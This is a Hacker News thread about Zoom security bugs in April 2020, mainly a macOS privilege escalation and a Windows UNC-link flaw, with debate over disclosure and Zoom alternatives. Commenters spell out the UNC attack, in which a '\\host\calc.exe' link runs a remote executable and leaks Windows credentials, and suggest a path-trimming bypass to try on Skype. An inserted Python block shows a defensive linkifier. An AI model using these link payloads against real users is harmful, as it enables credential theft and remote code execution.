
Ex-NSA hacker drops zero-day for Zoom - yarapavan
https://techcrunch.com/2020/04/01/zoom-doom/
======
Spooky23
__FOR IMMEDIATE RELEASE: Zoom Zero Day__

Spooky23, a former guest of a Holiday Inn also used by elite NSA hackers,
discovered that if you walk into a remote worker's home while they are
engaged and distracted by a Zoom meeting, you can physically pick up the
laptop and throw it out the window. In most cases, this will result in a
denial of service.

Zoom has not made a fix available at this time. Users can work around this
threat by securing any nearby windows.

~~~
CivBase
This is funny, but I don't think the issue should be so quickly dismissed.

The machine must already be compromised for this vulnerability to be useful,
but that doesn't necessarily mean it isn't a problem. A good security model
uses layers to reduce the impact of successful attacks. This vulnerability
potentially enables an attacker to escalate their privileges, bypassing some
of those layers and compromising the machine further.

This article probably overstates the problem (maybe don't use "doom" in the
headline next time, even though it rhymes) and there are plenty of examples of
worse vulnerabilities, but that doesn't excuse this one.

~~~
richardwhiuk
The vulnerability here is surely in Mac OS X though?

~~~
Wowfunhappy
No it's not. Mac OS X is allowing a program that was given root permissions to
execute code with root permissions.

------
duxup
This seems like a security bug, but not exactly a high risk one considering it
requires you to actually have possession of the computer.

Presumably if you have possession of the computer and are able to exploit this
bug, you could do any number of other things anyway...

Zoom might have issues but if I were to list them, this wouldn't be high on /
make the list. Obviously they should fix it, but of all the things, not sure
this one is front page worthy.

~~~
user5994461
This should be exploitable on the local network. This is a network share
vulnerability.

I suspect there was a nasty mis-translation. The article should have said
"local network", but it was stripped down to "local" and gets misinterpreted
as "local computer".

~~~
saagarjha
I don't see anything to do with network shares?

~~~
user5994461
First paragraph: two security researchers finding a Zoom bug that can be
abused to steal Windows passwords...

https://twitter.com/hackerfantastic/status/1245133371262619654

------
luma
Shitting on zoom in your headline appears to be this week's low latency path
to more clicks, no matter how contrived the claim is.

~~~
BoysenberryPi
I'm typically very out of the loop on things but is there any particular
reason HN seems to be hell bent on shitting on Zoom this week. Don't recall
seeing this much vitriol for a particular product in a while.

~~~
remcob
Due to quarantine remote working, a lot of people are obliged to use Zoom. To
some Zoom has a reputation of not taking security seriously, so they feel
forced to compromise the security of their computers. Personally I think this
reputation is justified.

You can access Zoom meetings through a pure web interface without installing
anything. The experience is somewhat reduced.

~~~
zeeZ
And to get to the pure web interface you'll have to either know the magic URL
or fight some more dark patterns, because they really want you to install
their software.

------
user5994461
This is linking to a source on Twitter
https://twitter.com/hackerfantastic/status/1245133371262619654
with a short demo on YouTube
https://www.youtube.com/watch?v=Om1w4DVkkEU

From what I can gather, you can send a message in Zoom with a link like
"\\host.example.com\calc.exe". Zoom will highlight it as a clickable link.

Assuming you can get the user to click it:

1) It will fetch the remote executable and run it.

2) It transparently transmits the Windows authentication of the user to the
remote server, expecting a network share that may require authentication.

~~~
luma
You can also do the exact same thing in any messaging app.

~~~
user5994461
I don't think so. Other messaging apps don't parse strings starting with \\
as links, and if they do, they hopefully undo it for the .exe extension.

~~~
luma
Have you tried that?

Hangouts: \\servername.tld\share doesn't parse as a UNC path; instead it
becomes clickable and brings up a browser to "servername.tld"

Skype for Business: does exactly what Zoom does, turns the entire thing into a
clickable link

MS Teams: doesn't parse as clickable at all

That's all I have in front of me at the moment...

~~~
Dylan16807
> Does exactly what Zoom does, turns the entire thing into a clickable link

_And_ runs it when you click on it?

~~~
luma
Just went and confirmed, in Skype for Business it does not launch the
executable but rather opens explorer to the share and highlights the .EXE. So,
anyone operating that share will still be passed your creds, but it doesn't
launch the executable.

Testing in Zoom, it launches the OS prompt to confirm .exe launch. Tested on
Windows 10.

~~~
user5994461
Could you try Skype with \\servername.tld\path\file.exe\extra.text?

There is a good chance it will run file.exe if they cut the end of the string
naively. :D
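The linkifier behaviour this subthread is probing (a chat client turning a UNC path into a clickable link, and the \\host\path\file.exe\extra.text trick against naive trimming) as an added defensive example; this is not code from the thread or from Zoom or any other client named here. It renders only web URLs as anchors, leaves UNC paths as inert text, and reports why each one was refused; all sample messages are constructed.

```python
import html
import re
from typing import List, NamedTuple

# Windows UNC path: two backslashes, a host name, then backslash-separated
# segments. Segments stop at whitespace and HTML-significant characters.
UNC_PATH = re.compile(r'\\\\[A-Za-z0-9.\-]+(?:\\[^\\\s<>"|]*)*')
HTTP_URL = re.compile(r'https?://[^\s<>"]+')
# Extensions Windows will execute when opened from a share (assumed list).
EXEC_EXT = ('.exe', '.scr', '.bat', '.cmd', '.com', '.msi', '.lnk', '.pif')


class Link(NamedTuple):
    text: str
    kind: str        # 'http' or 'unc'
    clickable: bool
    reason: str


def classify(text: str) -> List[Link]:
    """Find every link-like token and decide whether it may be clickable."""
    links = [Link(m.group(), 'http', True, 'web URL') for m in HTTP_URL.finditer(text)]
    for m in UNC_PATH.finditer(text):
        raw = m.group()
        segments = raw.strip('\\').split('\\')
        host = segments[0]
        # Inspect every segment, not only the last one: a linkifier that
        # trims after the final backslash would still open file.exe in
        # \\host\path\file.exe\extra.text
        exe = [s for s in segments[1:] if s.lower().endswith(EXEC_EXT)]
        if exe:
            reason = f'UNC path containing executable {exe[0]}'
        else:
            # Even without an executable, merely connecting to the share
            # sends the user's NTLM credentials to the host.
            reason = f'UNC path to {host}; opening it sends NTLM credentials to that host'
        links.append(Link(raw, 'unc', False, reason))
    return links


def linkify(text: str) -> str:
    """Render a chat message: web URLs become anchors, UNC paths stay text."""
    parts, last = [], 0
    for m in HTTP_URL.finditer(text):
        parts.append(html.escape(text[last:m.start()]))
        url = html.escape(m.group())
        parts.append(f'<a href="{url}">{url}</a>')
        last = m.end()
    parts.append(html.escape(text[last:]))   # UNC paths end up here, inert
    return ''.join(parts)


if __name__ == '__main__':
    # Constructed sample messages, not taken from the page.
    for msg in ('notes at https://example.com/notes',
                r'check \\fileserver.example.com\share\calc.exe please',
                r'\\fileserver.example.com\path\file.exe\extra.text',
                r'\\fileserver.example.com\share\report.docx'):
        for link in classify(msg):
            print(f'{link.kind:4} clickable={link.clickable!s:5} {link.reason}')
        print('  rendered:', linkify(msg))
```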

~~~
luma
Oh that is an interesting approach...

Skype for business threw an error: "Sorry, we couldn't open the link".

------
dewey
> The two bugs, Wardle said, can be launched by a local attacker — that’s
> where someone has physical control of a vulnerable computer.

~~~
monocasa
It's still a root privilege escalation.

~~~
sc3n3ry
LPE has always been trivial on OS X... for the longest time, the passwordless
sudo timeout was not specific to the tty. So all you had to do was wait for
someone to use sudo, and you would be able to get root.

~~~
monocasa
Cool. Companies that go "I should use a LPE as part of my product" should
still be chastised.

------
jeroenhd
These are valid attacks for bypassing Gatekeeper on macOS, but they're not
root-level privilege escalation attacks (the user still needs to enter a
password) and they don't provide remote code execution.

It does show that whoever manages security at Zoom should go back to school
though. Operating system security features are not an obstacle but a tool.
Trying to work around them reminds me of the age of IE6 toolbars and "system
optimisers" who won't let you uninstall them.

------
antoncohen
> The two bugs, Wardle said, can be launched by a local attacker — that’s
> where someone has physical control of a vulnerable computer.

TechCrunch got this wrong. "Local" means local privilege escalation, as
opposed to "remote" code execution. They do not require physical access.

That being said, local privilege escalation on a single-user computer where
that user is an admin (most Macs) isn't a massive problem in my mind. It
would allow malware, once run by the user, to bypass security prompts usually
required to elevate access.

~~~
angry_octet
If Zoom was done well it would be a confined app, and controlling the Zoom
process wouldn't give you access to everything the user has access to, let
alone allow easy root privesc. It's just rubbish software.

(WebEx is as bad if not worse.)

------
TechBro8615
> Zoom’s troubled year just got worse.

This is an odd way of describing a year in which Zoom's stock has doubled in
price.

------
saagarjha
Slightly better link: https://objective-see.com/blog/blog_0x56.html

------
corndoge
Wow, I can't believe an NSA employee doesn't care about responsible disclosure
/s

~~~
saagarjha
He’s a bit sensationalist, to be sure, but the bugs mentioned are ones that
should be fixed. (If rather trivial to find…)

~~~
ilikehurdles
Responsible disclosure means giving the developers a chance to fix the bugs
before blasting the methods all over techcrunch.

~~~
saagarjha
I am aware of what responsible disclosure is; Patrick Wardle doesn't really
care for it because he prefers writing up his blog posts as it gives him a
chance to speak. But even putting aside his personal flaws, Zoom should fix
these issues.

------
cojoke
> In the meanwhile, Wardle said, “if you care about your security and privacy,
> perhaps stop using Zoom.

I feel like that's really easy to say if you're not an enterprise/big tech
employee who has to use the product to maintain their employment during the
quarantine.

Are there any privacy solutions out there for those of us who are required to
use Zoom anyway?

~~~
munchbunny
I'm not sure if a VM is an option given the need for a camera. If it is, I
think that's a pretty good option.

By default I would recommend a dedicated laptop for Zoom. Don't use it for
anything else. Also shut the laptop down completely when it's not in use.

This means there won't be anything to snoop on, and the hardware will be
turned off when you aren't using it.

~~~
snazz
You can pass a USB device (including a camera) to a VM. Then you can make sure
that Zoom always has focus within the VM to protect yourself from the
attention tracking functionality.

------
mrpippy
The answer is to use the web client. Either put the ID into
[https://zoom.us/join](https://zoom.us/join), or someone else on HN said that
replacing '/j' with '/wc/join' in a URL will use the web client.

------
DangerousPie
I think zero days are irresponsible in the best of times but releasing
something like this when their devs are probably all busy just keeping their
much-needed service running in times of a global crisis just seems insane.

------
jedieaston
Something that wasn't clear ("non-privileged attacker") is whether or not
running the Zoom installer as a non-admin user would be sufficient for it to
use its elevation mischief somehow. From what I see, it can't, because
AuthorizationExecuteWithPrivileges requires an admin's credentials to do
anything. But if that were the case, can you use the Mac Zoom client without
an admin's permission, or not?

If you don't need to give it admin credentials (and can just give it anyone's
non-special password instead) and it installs to /Applications without an
admin's permission, then there's a huge problem. If you do need to give it
admin credentials, this still needs to be fixed (urgently, as I'm sure there's
tons of one-off developer/designer macs that aren't monitored by IT and have
the Zoom client on them), but that would mean the security model on OS X
wasn't entirely broken by a badly written video conferencing installer.

------
saadalem
When I see much hate on a company, I know it's getting successful

------
mindfulplay
Why are startups born this way? Why optimize for growth and CTR etc. Is there
a world in which security and privacy focus (maybe sprinkle in, dare I say,
social good) could be funded from the start?

These companies presumably all pivot on going public and making a crapton of
money: couldn't they anticipate the need to respect the users longer term as
opposed to selling them like commodity to investors and advertisers?

The worst types are the ones that advertise how good and amazing they are, and
when the "tide goes out they are found swimming naked" as Buffett might say.

~~~
soared
No one in the real world (outside of the hn bubble) actually cares about
privacy, and only enterprise cares about security.

> need to respect the users longer term as opposed to selling them like
> commodity to investors and advertisers?

This is the opposite of the truth? There is no /market/ need to respect users,
the intention is to sell them to advertisers/etc. Your comment is just
conflating your personal (And hn's) moral views of privacy with how markets
actually work in the real world.

Edit - I don't mean to be a dick, but you can't just push your morals on the
world and say that's how the world should work.

~~~
thinkharderdev
I think this argument proves too much. It is true that most users don't care
or even understand the security and privacy issues in the software that they
use but that doesn't mean product developers shouldn't care. It is the precise
reason that product developers HAVE to care because they in fact understand
the danger (or should anyway) and should protect their users from them.

I could just as easily say that "users don't care whether we hash their
passwords in our database so why waste the CPU cycles" and I would be right.
The vast majority of users don't know anything about storing passwords
securely, but

1. They absolutely care if their passwords get pilfered and used to access
their accounts.

2. We still have an ethical responsibility to protect people from dangers
that we know full well can cause them harm even if they don't understand what
those dangers are.

~~~
soared
I agree, you make a good point. In that sense maybe privacy and security could
be a means to achieve something else that users do actually care about. (ex. I
don't want strangers in my zoom calls, so please make them secure)

------
djsumdog
> Zoom uses a "shady" technique — one that’s also used by Mac malware — to
> install the Mac app without user interaction

It reminds me of the Dropbox trick they used to get past the accessibility
restrictions. The implementation is different, but it's essentially to get
around all the limitations that Apple has been building into macOS.

I feel like developers shouldn't have to fight the operating system.

------
peterwwillis
We're in a pandemic. Telecommunications are of paramount importance to people
working in emergency and other services throughout the world. So of course,
security and privacy are more paramount than ever. But by releasing more and
more "problems" with Zoom, it slowly forces organizations to abandon Zoom as a
telecommunications option. Eventually people will not be _allowed_ to use Zoom
to do their jobs, which will make those jobs even more difficult than they
already are. Social distancing by itself saves lives by keeping infection (and
thus death) rates down, and this software is a critical part of making that
work.

> Because Wardle dropped detail of the vulnerabilities on his blog, Zoom
> has not yet provided a fix. In the meanwhile, Wardle said,
> “if you care about your security and privacy, perhaps stop using Zoom.”

_This is not the time to release 0-days in telecommunications software, people
need this software to save lives._

If you work in InfoSec, or just idle in random hacker channels, please push
back on this kind of behavior. It would be "irresponsible" at any other time,
but in this era, it's literally life-threatening.

~~~
saagarjha
If I was a hacker, I would be looking _real_ closely at Zoom since everyone is
using it right now.

------
user_50123890
If an attacker has physical access to a device, it should already be
considered compromised...

------
pastry90
There has to be some headline law where whenever someone claims to be an EX-{3
Letter Agency} hacker, their findings are inevitably mostly trash.

Wardle has done more to damage the reputation of the NSA than anyone else I'm
aware of.

------
burgerzzz
Can someone explain why I keep seeing Zoom on the frontpage? What sets it
apart from the rest that it gets discussed on HN so often recently? Is it a YC
company?

~~~
dang
It's a spinoff of the covid crisis. The rush to remote work has made Zoom much
more prominent than it was a few weeks ago. This has attracted a flood of
attention, so a lot of spotlights are trained on it right now. For the same
reason, we've been hearing all about ventilators lately [1]. That's not a
ventilator plot, it's article moths flocking to the spotlights.

With Zoom there are compounding factors. Software, video conferencing, video
conferencing software, and software businesses are all topics in HN's
wheelhouse—as is anything security or privacy related. There have been
security and privacy surprises (shall we say) with Zoom in the past, so people
are naturally hunting for more. Also, readers are primed to pattern-match any
new findings as part of the ongoing sequence. That's a strong multiplier.
Familiarity reactions—cache effects, if you like—magnify how much attention a
story attracts. There was a similar, though slower-motion, sequence of stories
about Facebook last year.

It's not a YC company.

When there's a major ongoing story, such as the current crisis, floods of
follow-up and copycat posts appear, since every website and media outlet wants
in on the action. After the Snowden deluge of 2013, we learned to moderate
these counter-cyclically, so that HN can surf the big waves without getting
totally sogged with repetition. The test for a new submission on a MOT
(Massive Ongoing Topic) is: does it contain SNI (Significant New Information)
[2]? If no, we downweight the MOT. If yes, we try to have one thread about
each SNI. I just made up those TLAs.

Zoom has become a MOT in its own right. You can tell that when objections like
[3..9] start cropping up. The question is: is the OP a SNI?

[1]
https://hn.algolia.com/?dateRange=all&page=0&prefix=true&query=ventilat&sort=byDate&type=story

[2]
https://hn.algolia.com/?dateRange=all&page=0&prefix=false&query=by%3Adang%20%22significant%20new%20information%22&sort=byDate&type=comment

[3]
[https://news.ycombinator.com/item?id=22749596](https://news.ycombinator.com/item?id=22749596)

[4]
[https://news.ycombinator.com/item?id=22743303](https://news.ycombinator.com/item?id=22743303)

[5]
[https://news.ycombinator.com/item?id=22748549](https://news.ycombinator.com/item?id=22748549)

[6]
[https://news.ycombinator.com/item?id=22750059](https://news.ycombinator.com/item?id=22750059)

[7]
[https://news.ycombinator.com/item?id=22750251](https://news.ycombinator.com/item?id=22750251)

[8]
[https://news.ycombinator.com/item?id=22753810](https://news.ycombinator.com/item?id=22753810)

[9]
[https://news.ycombinator.com/item?id=22754138](https://news.ycombinator.com/item?id=22754138)

~~~
burgerzzz
Thank you for the detailed response, very interesting!

------
mcintyre1994
Heh, have Techcrunch hired a Register headline writer? :)

------
huslage
It’s totally fine to go find bugs, but we have CVEs and responsible disclosure
for a reason. This is irresponsible.

------
aequitas
Can we stop using and finding bugs in the closed-source Zoom and direct that
effort to finding bugs in the open source Jitsi (or any other open source
solution) instead?

Even though it's free and open source there will be bugs and usability issues
that need to be solved. If we pool our effort right we can make open source
solutions into "just works" solutions, reducing the need for companies like
Zoom.

------
annoyingnoob
And Zoom proponents at my office still don't care - it's all about convenience
for most folks.

~~~
kristianc
For most folks, it really is about convenience.

If you propose a new videoconf solution, and the first time a C-suite or major
prospect joins the call the call buffers, or someone doesn't have the right
drivers installed, or someone doesn't know how to click the link - you are
absolutely getting hauled over the coals afterwards.

No one, at any company wants to get the "We're a technology company - why
can't we organize a video call?" line.

Convenience is often neglected by people proposing a privacy-conscious, self-
hosted FOSS alternative that merely requires you to install it from binary and
configure your own Digital Ocean droplet, but it really does matter.

~~~
thinkharderdev
This is absolutely true in practice, but there are degrees. Approximately 0
people are going to go full tinfoil hat and set up their own self-hosted FOSS
solution, but we absolutely should care if a product like Zoom does something
like, say, installs a local web server to bypass security controls on a user's
browser which can potentially open up any number of devastating remote
exploits that would be easy to exploit by any script-kiddy.

The fact that most users don't care is more reason why product developers HAVE
to care. I could just as easily say "only paranoid security people care if we
hash their passwords in our database so why waste the CPU cycles?" And I would
be right, the vast majority of users don't know anything about storing
passwords securely but they absolutely care whether their passwords get
pilfered by an attacker and used to compromise their account.

------
valuearb
Techcrunch disables the back button.

~~~
sharken
I fail to see how that is relevant, also the back button works for me (Firefox
on Windows).

------
dawnerd
Why do sites like Techcrunch think I'll stick around longer if they block the
back button?

------
LockAndLol
I guess it's time to respond to every thread shitting on zoom with: Just use
Jitsi Meet. [https://jitsi.org/jitsi-meet/](https://jitsi.org/jitsi-meet/)

It's free, it's open-source, and can be self-hosted.

------
chews
If this is NSA hacking... We've got some patriotic script kids.

------
logicallee
my comment on an earlier story:
[https://news.ycombinator.com/item?id=22748204](https://news.ycombinator.com/item?id=22748204)

------
vernie
Zoom seems to be enjoying a good, old-fashioned dogpile

------
starpilot
zoom zoom zoom

